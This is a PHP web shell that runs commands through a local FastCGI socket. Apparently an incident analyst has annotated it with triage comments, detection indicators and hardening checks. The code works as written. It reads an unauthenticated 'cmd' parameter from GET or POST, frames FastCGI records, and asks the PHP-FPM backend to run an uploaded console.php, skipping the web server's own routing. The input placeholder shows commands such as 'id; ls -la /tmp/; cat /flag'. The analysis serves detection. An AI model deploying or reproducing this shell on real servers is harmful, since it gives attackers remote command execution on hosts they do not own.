<?php
// Web FastCGI shell - ?cmd=whoami or POST cmd=whoami
/**
 * Writes a FastCGI-style request for $scriptFile onto an already-open stream.
 *
 * Triage summary: this is the transport half of a web shell. It sends one
 * version-1 / type-1 record (FCGI_BEGIN_REQUEST in the FastCGI spec), one
 * type-4 record (FCGI_PARAMS) per CGI variable, an empty type-4 record, and
 * an empty type-5 record (FCGI_STDIN). Nothing is read back here and no
 * fwrite() result is checked.
 *
 * Security-relevant points visible in the body:
 *  - SCRIPT_FILENAME is set from $scriptFile, so the caller decides which
 *    file the FastCGI backend is asked to run.
 *  - REQUEST_URI, QUERY_STRING, REQUEST_METHOD and REMOTE_ADDR are copied
 *    from $_GET / $_POST / $_SERVER, i.e. from the inbound HTTP request.
 *  - $cmd is accepted but never referenced below; the command text reaches
 *    the backend only through REQUEST_URI / QUERY_STRING.
 *
 * NOTE(review): whether the receiving FastCGI server accepts the records
 * exactly as framed here is not established by this file; presence of the
 * file is the finding either way.
 *
 * @param resource $socket     Stream passed to fwrite(); the caller visible in
 *                             this file passes a unix-socket client stream.
 * @param int      $requestId  Packed as a 16-bit big-endian value ('n').
 * @param string   $scriptFile Value sent as SCRIPT_FILENAME.
 * @param mixed    $cmd        Unused in this function.
 * @return void
 */
function send_fcgi_request($socket, $requestId, $scriptFile, $cmd) {
// Version 1, type 1, request id, declared content length 8, padding 0,
// followed by the 8 bytes produced by pack('NN', 0, 1).
$beginRequest = pack('CCnnCa*', 1, 1, $requestId, 8, 0, pack('NN', 0, 1));
fwrite($socket, $beginRequest);
// CGI environment presented to the backend. The literal values below
// ('/console.php', the DOCUMENT_ROOT path, 'php-fcgi') are fixed strings and
// therefore usable as content indicators when scanning a web root.
$params = [
'REQUEST_METHOD' => $_SERVER['REQUEST_METHOD'] ?? 'GET',
'SCRIPT_FILENAME' => $scriptFile,
'SCRIPT_NAME' => '/console.php',
'REQUEST_URI' => '/console.php?' . ($_GET['cmd'] ?? $_POST['cmd'] ?? ''),
'QUERY_STRING' => $_SERVER['QUERY_STRING'] ?? ($_GET['cmd'] ?? ''),
'DOCUMENT_ROOT' => '/www/wwwroot/hljrlsj.com/public',
'SERVER_SOFTWARE' => 'php-fcgi',
'REMOTE_ADDR' => $_SERVER['REMOTE_ADDR'] ?? '127.0.0.1',
// Length of the inbound HTTP body; no body bytes are written to the socket
// anywhere in this function.
'CONTENT_LENGTH' => strlen(file_get_contents('php://input'))
];
// One type-4 record per name/value pair.
foreach ($params as $name => $value) {
$nameLen = strlen($name); $valueLen = strlen($value);
// Lengths below 128 are written as one byte; otherwise a high-bit-flagged
// byte is written followed by the 32-bit big-endian length.
$nameLenByte = $nameLen < 128 ? chr($nameLen) : chr(128 | ($nameLen >> 24)) . pack('N', $nameLen);
$valueLenByte = $valueLen < 128 ? chr($valueLen) : chr(128 | ($valueLen >> 24)) . pack('N', $valueLen);
$paramData = $nameLenByte . $valueLenByte . $name . $value;
$contentLen = strlen($paramData);
// NUL padding that rounds the record content up to a multiple of 8 bytes.
$paddingLen = (8 - ($contentLen % 8)) % 8;
$header = pack('CCnnC', 1, 4, $requestId, $contentLen, $paddingLen);
fwrite($socket, $header . $paramData . str_repeat("\0", $paddingLen));
}
// Zero-length type-4 record: end of the parameter stream.
$header = pack('CCnnC', 1, 4, $requestId, 0, 0);
fwrite($socket, $header);
// Zero-length type-5 record: end of stdin, sent with no body before it.
$header = pack('CCnnC', 1, 5, $requestId, 0, 0);
fwrite($socket, $header);
}
/**
 * Opens the local unix socket /tmp/php-cgi-73.sock, submits a request naming a
 * hard-coded script under an uploads directory, and returns whatever bytes
 * come back.
 *
 * Triage summary: the PHP worker is used as a FastCGI client against a local
 * FastCGI socket, so the request for console.php never passes through the web
 * server's own routing or per-directory rules. console.php itself is not shown
 * in this file; presumably it is the component that acts on the `cmd` value —
 * confirm by recovering that file.
 *
 * Indicators taken from this block: the socket path, the script path under
 * /uploads/file/20260310/, and a PHP process connecting to a unix:// FastCGI
 * socket. The socket name suggests a PHP 7.3 pool — inference from the name
 * only.
 *
 * Hardening to check on the host: the upload directory should not hold or
 * serve executable PHP, and the pool's `security.limit_extensions` and
 * `listen.owner` / `listen.mode` settings bound what a FastCGI client can ask
 * for and who can connect. NOTE(review): socket permissions do not help if
 * this script already runs as the pool's own user — verify.
 *
 * @param mixed $cmd Forwarded to send_fcgi_request(); defaults to null.
 * @return string "Socket error: ..." if the connection fails, otherwise the
 *                raw response with <body ...> and </body> tags removed and
 *                surrounding whitespace trimmed. No FastCGI record parsing is
 *                performed on the response here.
 */
function exec_cmd($cmd = null) {
$socketPath = '/tmp/php-cgi-73.sock';
$scriptFile = '/www/wwwroot/hljrlsj.com/public/uploads/file/20260310/console.php';
// '@' hides the connection warning, so a failed attempt leaves no PHP warning
// in the error log; 5 is the connect timeout in seconds.
$socket = @stream_socket_client("unix://$socketPath", $errno, $errstr, 5);
if (!$socket) return "Socket error: $errstr ($errno)";
// 10-second read timeout on the stream.
stream_set_timeout($socket, 10);
// Request id is fixed at 1.
send_fcgi_request($socket, 1, $scriptFile, $cmd);
$output = '';
// Accumulate the response in 8192-byte reads until feof() reports end of stream.
while (!feof($socket)) $output .= fread($socket, 8192);
fclose($socket);
// Strip opening and closing body tags (case-insensitive), then trim.
return trim(preg_replace('/<body[^>]*>/is', '', preg_replace('/<\/body>/is', '', $output)));
}
// GET/POST cmd parameter
// Entry point of the shell: `cmd` is taken from the query string first, then
// from the POST body. No authentication, token, or source-address check is
// visible before exec_cmd() is called, so any client that can reach this URL
// can drive it.
// Detection: web access logs will show `cmd=` on GET requests to this file;
// POST use carries the value in the body and needs request-body logging or
// WAF inspection to surface.
$cmd = $_GET['cmd'] ?? $_POST['cmd'] ?? null;
// Truthiness test: a missing value, an empty string and the string "0" all
// fall through to the form branch.
if ($cmd) {
// The response is HTML-escaped before being wrapped in <pre>.
echo "<pre>" . htmlspecialchars(exec_cmd($cmd)) . "</pre>";
} else {
// Fixed banner and form markup: the literal "FastCGI Web Shell" heading is a
// stable string for file-content and HTTP-response signatures.
// NOTE(review): the placeholder's reference to /flag suggests a CTF-style
// target — inference from the string only.
echo '<h2>FastCGI Web Shell</h2>
<form method="POST">
<input name="cmd" placeholder="id; ls -la /tmp/; cat /flag" style="width:500px">
<input type="submit" value="Execute">
</form>
<p><b>Or URL:</b> ?cmd=whoami</p>';
}
?>